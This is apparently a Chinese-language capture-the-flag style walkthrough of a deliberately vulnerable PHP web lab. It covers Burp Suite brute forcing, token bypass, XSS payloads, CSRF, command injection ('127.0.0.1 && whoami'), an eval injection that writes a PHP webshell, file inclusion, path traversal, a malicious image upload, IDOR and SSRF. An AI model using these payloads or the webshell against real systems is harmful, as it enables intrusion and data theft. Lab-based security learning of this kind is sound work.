暴力破解

基于表单的暴力破解

【2024版】最新BurpSuit的使用教程（非常详细）零基础入门到精通，看一篇就够了！让你挖洞事半功倍！_burpsuite使用教程-CSDN博客

登录页面，随意输入抓包，发送到攻击模块

我们攻击要两个目标，选择集群炸弹攻击，用户名是wp看到的

导入弱密码本开始攻击，看到三组账号密码

返回登录即可

验证码绕过(on server

同样随意输入抓包

和上关一样的操作，抓到的账号密码也和上关一样，随后发送到重放器修改正确的账号密码发送即可

验证码绕过(on client)

同上一样的操作，抓包爆破，得到的账号密码也一样

token防爆破

抓包

可以看到有token值，token是后端产生的一个字符串，并且会发给前端，每当前端发起一次登录请求时，就会把该token一起发给后端，后端在验证账号密码前会先验证token的值是否正确然后才会验证账号密码；后端每收到一次请求就会产生一个新的token，同时把token连同响应信息一起发给前端

可以看到token在前端，而且很长，是由定义的计算得来的，所以我们没办法直接爆破

我们使用干草叉爆破，密码照样导入密码本

token的payload模式如图选择，在设置中选定payload值

获取响应之后选中token值，会自己设置payload值攻击得到密码和token值

发送到重放器发送即可

反射型xss(get)

打开想输入常规的检查语句触发弹窗，发现有字数限制

直接改源码

再发送即可

反射性xss(post)

先是登录界面，和第一关一样爆破而已这里直接用之前的账号密码登录

再是使用上一关的做法即可

存储型xss

同上

DOM型xss

尝试，显然不行

看源码可以看到超链接等于我们输入的值

那么输入JavaScript:alert()为协议触发js代码执行即可打开弹窗

DOM型xss-x

尝试输入弹窗字符串显然没用，看源码

还是有超链接，同上

xss盲打

输入弹窗字符没反应，看源码甚至前端都没有输入的字符

了解原理

在一些网站应用中，存在 XSS 漏洞的页面可能并不直接在当前用户的浏览器中显示，或者即使存在漏洞但由于页面的显示逻辑、访问权限等原因，攻击者无法即时看到注入的恶意脚本是否执行以及执行的结果。此时，攻击者将恶意脚本注入到目标网站中，当满足特定条件（比如管理员或其他具有特定权限的用户访问了包含恶意脚本的页面）时，恶意脚本会在目标用户（通常是权限较高的用户）的浏览器中执行。恶意脚本执行后，会将窃取到的敏感信息（如用户的 Cookie、会话令牌等）发送到攻击者控制的服务器上，攻击者就可以利用这些信息进一步控制用户的账号或进行其他非法操作。

简单来说我们在外来普通账户去输入恶意代码是会被强制发送到后端，我们无法看到代码是否执行，我们需要得到类似管理员账号登录后再进行操作，才可能执行成功

这边也有给提示后台的地址

先发送代码，之后登录后台即可

xss之过滤

输入弹窗代码，给了提示估计是一些字符串被过滤了

看样子是<>被过滤了，尝试onfocus事件

也是不行，回头看上传的字符串像是被删除了<script>alert()</script>变成了>，尝试使用双写字符绕过<scri<script>pt> alert()</scri</script>pt>，还是一样错了，那应该不是简单的替换

答案是使用img标签进行弹窗

<img src=''οnerrοr='alert(1)'/>

xss之htmlspecialchars

输入弹窗代码，可以看到还是有超链接

使用js为协议触发超链接即可

xss之href输出

同上，有超链接

和上面一样的解决办法

xss之js输出

输入弹窗代码，没有反应也没有超链接

随意输入字符发现把我们输入的字符用<script><script>包裹且中间有一些判定条件

按照提示输入tmac弹出图片

原本是会执行alert(ms)并输出语句的但是这行代码被加了注释，所以只会输出语句，现在的思路就是要构造ms去弹窗，就是考对js代码的运用而已

答案是';alert();//     先用'闭合前面加注释的字符串，再用；分割开使后面的代码能够正常运行后面还要加//注释也是保证代码运行

CSRF(get) login

随意输入之后抓取，开始爆破

爆破没有结果，之后看提示给了账号密码，随意选一个登录

随意修改之后抓包

仔细看会发现给了一个地址,使用在线编辑器编辑一个网站内容是抓包的链接，因为本题是get传参所以可以用链接来请求

发送给目标若点击链接即可修改信息

CSRF(post)

同样登录一个账号

修改抓包

post请求要自己去写一个表单，放在网站的目录中，当用户点击就会被修改信息，这边等代码知识扎实一点再来

CSRF Token

同上

exec "ping

尝试ping一下本地地址

输入127.0.0.1 && whoami，可获得信息

“&&”在命令行中通常表示逻辑与操作，即只有当左边的命令成功执行后，才会执行右边的命令。“whoami”是一个命令，用于显示当前用户的名称，先尝试ping地址，如果成功再执行“whoami”命令显示当前用户名称。

exec "eval"

随意输入

根据提示，我们提交的字符串会以eval(字符串)形式执行，而eval（）函数会将括号中正确的php代码当成php文件执行，所以我们在里面生成一个一句话木马即可

file_put_contents('456.php','<?php eval(@$_REQUEST[456]);?>');

创建一个名为456.php的文件使用file_put_contents()函数将一句话木马写进456.php

上传蚁剑链接

本地文件包含

随意查一个

可以看到url栏中有文件名，查询一下file2.php

那么应该可以用这个去查本地文件

目标文件应该是隐私文件，在电脑里面看路径即可，常用的路径

远程文件包含

上传之后可以看到相较于上一题多了include函数

include可以执行php函数，可以看到文件内部存在应该一句话木马，我们尝试访问

将路径改成木马的地址

访问链接即可

不安全的文件下载

新标签页打开

看到它下载的文件名是可以控制的

输入对应路径的文件名之后我们就可以下载对应文件

客户端check

本来想上传php文件抓包更改的，发现提示验证在前端

发送平图片抓包，更改文件格式即可

服务端check

同上

getimagesize()

还是只能上传图片，这边也尝试了上关的办法，显然不行，应该是多了验证，这边我们将图片和php木马合成一张新图片

上传之后显然还没执行php文件，这边可以利用前关有一个include函数，来执行php代码

将图片路径用前几关的include访问即可

op1 login

爆破不出来，提示里有账号密码

可以看到通过url地址可以查看其他人的信息

op2 login

提示我们有两个用户一个是超级用户，一个是普通用户

超级用户有修改功能，点击添加用户

可以看到url后置有一个php文件，复制起来，登录普通用户，将文件加上会发现普通用户也能添加用户

../../

这题和前几提一个一样，修改url的目标文件以达到访问文件的目的，就是要加上../../../去跳到对应目录

find abc

在源码可以看到测试账号

登录，可以看到url中的文件，所以直接访问也是可以的

php反序列化

php反序列化-CSDN博客

这个漏洞是利用程序会接受一个序列化的字符串之后，将他反序列化之后执行

也就是我们哟将弹窗代码序列化之后输入就能弹窗

题目其实也给了序列化的函数，但是一下函数已经过时了，比如说var

O:代表object，1:代表对象名字长度为一个字符，S:对象的名称，1:代表对象里面有一个变量，s数据类型，4变量类型长度为4，变量类型为test，长度为29，变量值

一般生成序列化字符串是用程序生成的

不安全的url跳转

给了几个超链接都点一下发现最后一个url中是通过url=...定位

可以利用这个去跳转到想要的网站

ssrf(curl)

点击超链接

同上可以访问我们想要的网站或者木马也可以，之后再使用上面的include即可执行连接

ssrf(file_get_content)

点击超链接

使用php为协议可以得到对应文件